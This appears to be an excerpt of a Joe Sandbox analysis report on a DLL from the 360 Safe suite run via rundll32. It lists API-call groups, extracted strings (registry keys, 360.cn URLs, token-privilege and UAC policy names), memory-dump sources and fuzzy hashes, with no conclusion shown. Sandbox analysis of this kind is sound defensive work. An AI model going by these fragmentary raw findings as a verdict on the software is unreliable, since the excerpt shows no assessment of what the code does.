                                                                                                  • API ID: CloseHandle$File$Path$ExistsProcess$AppendCreateCriticalModuleNameSection$CodeControlCurrentDeviceEnterExitLeaveObjectResumeSingleThreadWait_cwprintf_s_l_mbsrchr_mbsstrmemset
                                                                                                  • String ID: "%s" %s authcode:$..\360netmgr64.exe$..\deepscan\360netmgr64.exe$cmd:
                                                                                                  • API String ID: 2520577183-130467596
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Variant$Clear$Init
                                                                                                  • String ID: //root/config/item$install_first_open$name$pop_count$propoganda$tray_startup$update_first_open$value
                                                                                                  • API String ID: 3740757921-2166998829
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$CriticalSectionmemset$AppendPath$??3@CountEnterErrorFileFreeInitializeLastLeaveLibraryModuleNameSpin
                                                                                                  • String ID: ..\deepscan\$360Safe$360util$QueryFileCancel$QueryFileClose$QueryFileCreate$QueryFilesEx2$QuerySetOption$cloudcom2.dll
                                                                                                  • API String ID: 1015768321-2684063875
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Xinvalid_argumentstd::_$CriticalSection$EnterExceptionLeaveThrow
                                                                                                  • String ID: AddLog$CreateLog$Init$RemoveLog$Uninit$Util$dfafidjalkfjdalksjfjklfads$http://dr.f.360.cn/scan$list<T> too long
                                                                                                  • API String ID: 2114436830-3408081781
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memmove$_wcsicmp$??3@HeapProcess
                                                                                                  • String ID: combo$ipartner$mid$pid$product$sysver$version
                                                                                                  • API String ID: 2498835641-470606306
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Close$FreeLibraryOpenPathQueryValuememset$AddressAppendExistsFileHandleModuleProc
                                                                                                  • String ID: Init$Path$SOFTWARE\360Safe\360Ent$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe$ServiceCall$\entclient\EntSvcCall_x64.dll
                                                                                                  • API String ID: 1498439332-702965266
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcsstr$ExtensionFindPath_wcsicmp_wtoiwcschr
                                                                                                  • String ID: CLSID$InprocHandler$InprocHandler32$InprocServer$InprocServer32$LocalServer$LocalServer32$Server$ShellExecute$\\?\$gfffffff$gfffffff
                                                                                                  • API String ID: 3861457700-2318594275
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CountTick$Sleep
                                                                                                  • String ID: ..\$..\cloudcom264.dll$..\deepscan\cloudcom264.dll$CreateObject
                                                                                                  • API String ID: 4250438611-3269604003
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$_wcsicmp$AppendCriticalPathSectionValue$EnterFileLeaveModuleName
                                                                                                  • String ID: 360ExtHost$PCInfo$Partner$SOFTWARE\Wow6432Node\360EDRSensor$SOFTWARE\Wow6432Node\360EntSecurity$SOFTWARE\Wow6432Node\360SD$SOFTWARE\Wow6432Node\360Safe\Coop$ipartner$pid
                                                                                                  • API String ID: 3226263223-3142758636
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Count_cwprintf_s_lmemset$??3@Tickmemmove$??2@CriticalErrorHeapInitializeLastProcessSectionSpinrandsrand
                                                                                                  • String ID: 0=%s$360safe$DomainQuery$[%s]$com$mid=%sm2=%sproduct=%scombo=%srule_group_id=%suv=%s$router$router:1
                                                                                                  • API String ID: 1789426470-3446598425
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcscmp$Token$GlobalInformationProcess$AccountAllocCloseCurrentErrorFreeHandleLastLookupOpen
                                                                                                  • String ID: LOCAL SERVICE$NETWORK SERVICE$NT AUTHORITY$SYSTEM
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Similarity
                                                                                                  • API ID: AppendPath$FileModule$Namememset$AttributesHandle
                                                                                                  • String ID: ..\$..\deepscan\$bapi64.dll
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Similarity
                                                                                                  • API ID: _cwprintf_s_l$??3@CountHeapProcessStringTickmemmoverandsrand
                                                                                                  • String ID: %d=%s$[%s]$com$mid=%sm2=%sproduct=%scombo=%srule_group_id=%suv=%spid=%s
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmp_wcsnicmp$wcsstr
                                                                                                  • String ID: Software\Classes\Wow6432Node$Software\Classes\Wow6432Node\$Software\Wow6432Node$Software\Wow6432Node\$Wow6432Node$Wow6432Node\$wow6432node
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Similarity
                                                                                                  • API ID: FilePath$AppendExistsModuleNamememset$CriticalSection$EnterLeave
                                                                                                  • String ID: ..\360SkinMgr.exe$..\360sd.exe$..\safemon\360Cactus.tpi
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Similarity
                                                                                                  • API ID: Process$Current$ErrorLastToken$AuthorityCloseCountHandleOpen$AdjustInformationLookupPrivilegePrivilegesTickValuesrand
                                                                                                  • String ID: EnableLUA$SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege$Software\Microsoft\Windows\CurrentVersion\Policies\System
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Similarity
                                                                                                  • API ID: AppendFileModuleNamePathmemset
                                                                                                  • String ID: ..\360bps.dat$//lsp/fnp$//lsp/fnpw
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Similarity
                                                                                                  • API ID: CriticalFileSection$EnterLeavefreemallocmemset$CloseCreateHandleReadSizeTime
                                                                                                  • String ID: D063$|
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Similarity
                                                                                                  • API ID: AppendPathmemset$CriticalFileModuleNameSectionValue_wcsicmp$EnterLeave
                                                                                                  • String ID: Partner$PartnerName$SOFTWARE\Wow6432Node\360EDRSensor$SOFTWARE\Wow6432Node\360EntSecurity$SOFTWARE\Wow6432Node\360SD$SOFTWARE\Wow6432Node\360Safe\Coop$pid
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Similarity
                                                                                                  • API ID: ??2@rand$??3@CountCriticalHeapInitializeProcessSectionTickmemsetsrand
                                                                                                  • String ID: 360safe$WifiCheckQuery$http://%s/wcheckquery$wificheck$wificheck:1
                                                                                                  • API String ID: 2719022499-1298750920
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Close$Open$QueryValue$PathProcess$AddressAppendCommandCurrentExistsFileFreeHandleLibraryLineProcTokenmemsetwcsstr
                                                                                                  • String ID: /elevated$SOFTWARE\360Safe\360Ent$ServiceCall
                                                                                                  • API String ID: 3868077243-983453937
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressCurrentFolderFromHandleListLocationMallocModulePathProcProcessSpecialwcsstr
                                                                                                  • String ID: (x86)$IsWow64Process$Kernel32.dll$\SysWOW64$\System32
                                                                                                  • API String ID: 3215350457-2087702655
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionHeapMutexProcessThrow$AllocCloseCreateCurrentErrorHandleLastObjectReleaseSingleWait_vsnwprintf
                                                                                                  • String ID: %s %u$1830B7BD-F7A3-4c4d-989B-C004DE465EDE
                                                                                                  • API String ID: 2737990526-332789905
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$String$EnterLeave$AllocByte$CountFreeTickrandsrand
                                                                                                  • String ID:
                                                                                                  • API String ID: 2388112003-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharDesktopFolderMultiWidememset
                                                                                                  • String ID: http://$https://
                                                                                                  • API String ID: 1422489264-1916535328
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ClearStringVariant$Alloc$CreateFreeInitializeInstanceQueryServiceUninitializeUnknown_
                                                                                                  • String ID: open
                                                                                                  • API String ID: 3369762758-2758837156
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Module$CountCriticalErrorFileHandleInitializeLastNameSectionSpin_errnomemmovememset
                                                                                                  • String ID: APPID$Module$Module_Raw$REGISTRY
                                                                                                  • API String ID: 1381946311-2529269209
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wtoi$memsetwcspbrk$Value_mktime64
                                                                                                  • String ID: Coop$registtime
                                                                                                  • API String ID: 3119170779-49026069
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 0000000180062148: memset.MSVCRT ref: 000000018006217C
                                                                                                    • Part of subcall function 0000000180062148: GetModuleFileNameW.KERNEL32 ref: 0000000180062193
                                                                                                    • Part of subcall function 0000000180062148: PathCombineW.SHLWAPI ref: 00000001800621AA
                                                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 00000001800621DB
                                                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 00000001800621EF
                                                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062203
                                                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062217
                                                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006222B
                                                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006223F
                                                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062253
                                                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062267
                                                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006227B
                                                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006228F
                                                                                                  • OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060B9F
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060BD7
                                                                                                  • OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060BF2
                                                                                                  • GetModuleFileNameExW.PSAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C0E
                                                                                                  • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C1F
                                                                                                  • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C2F
                                                                                                  • OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C4A
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C76
                                                                                                  • SysFreeString.OLEAUT32 ref: 0000000180060C89
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$HandleModuleOpenProcess$CloseFileName$CombineFreePathStringmemset
                                                                                                  • String ID: Kernel32.dll$QueryFullProcessImageNameW
                                                                                                  • API String ID: 930578061-1170590071
                                                                                                  • Opcode ID: 21058d059558c167eb128ecc070ccb7a1d86f5313822a2293c00ae13ac054d8f
                                                                                                  • Instruction ID: 54324c73b988387a6f6bb080a4d890c873d93734858c8758c4fce1d00ab0755c
                                                                                                  • Opcode Fuzzy Hash: 21058d059558c167eb128ecc070ccb7a1d86f5313822a2293c00ae13ac054d8f
                                                                                                  • Instruction Fuzzy Hash: AD418231B01F089AE751CBA2EC04BDD72A2BB4DBD4F548524EE69637A4DF388619C344
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: memmove$_time64memsetrandsrand
                                                                                                  • String ID:
                                                                                                  • API String ID: 532172381-0
                                                                                                  • Opcode ID: 6ebde1e15a5daa3d485701c01873e90b9359cc9e4f17f74e3b8bc65d2ffc7e04
                                                                                                  • Instruction ID: 3d32fb05b4f0e0362b7b9cd0aaa418761e9398a752506ae5bdaf1bf6c7f8014f
                                                                                                  • Opcode Fuzzy Hash: 6ebde1e15a5daa3d485701c01873e90b9359cc9e4f17f74e3b8bc65d2ffc7e04
                                                                                                  • Instruction Fuzzy Hash: 2281CF72200F8886EB95DB15E8813DA73A5FB8C7D8F119125EA9A03BA4DF38C64DC740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: _errno$?terminate@@C_specific_handlerabortfreeiswctype
                                                                                                  • String ID: csm$f
                                                                                                  • API String ID: 3008409500-629598281
                                                                                                  • Opcode ID: cb4ff8b5ebe89d3986471470a6de958979d9adc1f1dde0f1a6724a9577e23cc3
                                                                                                  • Instruction ID: 7b0f8dd17277ba6112c52f93bbbd1643d611d3ff89c652db72cc518acb6e3753
                                                                                                  • Opcode Fuzzy Hash: cb4ff8b5ebe89d3986471470a6de958979d9adc1f1dde0f1a6724a9577e23cc3
                                                                                                  • Instruction Fuzzy Hash: 1D819172781B0889FBA6DFA490503EC23E0EF4C7D8F048515FA5917BC9DE3A8A599321
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: AuthorityCountCurrentExecuteProcessShellWindow$CreateErrorFindForegroundInformationInitializeInstanceLastQueryServiceTickTokenUnknown_memsetsrandwcsstr
                                                                                                  • String ID: Progman$Program manager$http://$open$p
                                                                                                  • API String ID: 1516062321-2122229248
                                                                                                  • Opcode ID: 58ac5753a69af218fee8d4caaaed4576b5dee7a80132d74c2a967a22724bbafe
                                                                                                  • Instruction ID: 5854d287d17234f5949c9620cb83c855c738d658d9246579e802d6f7b8ceff8d
                                                                                                  • Opcode Fuzzy Hash: 58ac5753a69af218fee8d4caaaed4576b5dee7a80132d74c2a967a22724bbafe
                                                                                                  • Instruction Fuzzy Hash: A971A672209F8981FBA19B29D4913DE7360F7C97F4F058326BA6942AD5DF38C648C744
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendCloseFileModulememset$AddressExistsHandleHeapNameProcProcessQueryValue_wcsicmp
                                                                                                  • String ID: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360EDRSensor.exe$safemon\360EDRSensor.exe
                                                                                                  • API String ID: 1838183957-848848004
                                                                                                  • Opcode ID: 53d40d4281f59d1785bb74b81d44e61fae45e923a74e0e4f630338c30aea0692
                                                                                                  • Instruction ID: 12369466515329e4b94078003e01a8293ee627d21bf6a1b54a8e48e621231722
                                                                                                  • Opcode Fuzzy Hash: 53d40d4281f59d1785bb74b81d44e61fae45e923a74e0e4f630338c30aea0692
                                                                                                  • Instruction Fuzzy Hash: F9617132614A4886EBA1DF25E8543DA73A4FB8C7E4F408215BAAD437E5DF39C749CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendCloseFileModulememset$AddressExistsHandleHeapNameProcProcessQueryValue_wcsicmp
                                                                                                  • String ID: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360ExtHost.exe$safemon\360ExtHost.exe
                                                                                                  • API String ID: 1838183957-351904165
                                                                                                  • Opcode ID: 1e39c5d7731f9f0cfe2357af418d2a02b58939d64fc7587de7a383dead0b9532
                                                                                                  • Instruction ID: 01aece9f02afbb37390a2111cb2c5fee408a8cfe5dec439bdff79febd640f7a5
                                                                                                  • Opcode Fuzzy Hash: 1e39c5d7731f9f0cfe2357af418d2a02b58939d64fc7587de7a383dead0b9532
                                                                                                  • Instruction Fuzzy Hash: 27615132614A4892EBA1DB25E8543DA73A4FB8C7E4F448315BAAD436F5DF39C749CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: _time64
                                                                                                  • String ID: 360Ent$ForceNoPopup
                                                                                                  • API String ID: 1670930206-2160763818
                                                                                                  • Opcode ID: 3df8c11bbac872115ce6f895ee47564cdc6bd6ec8b8168957dd4759c0a914245
                                                                                                  • Instruction ID: 01ea4ee26c0475092520961f9a9bd5e8ca1980a4bc00605aab446d8ce5817636
                                                                                                  • Opcode Fuzzy Hash: 3df8c11bbac872115ce6f895ee47564cdc6bd6ec8b8168957dd4759c0a914245
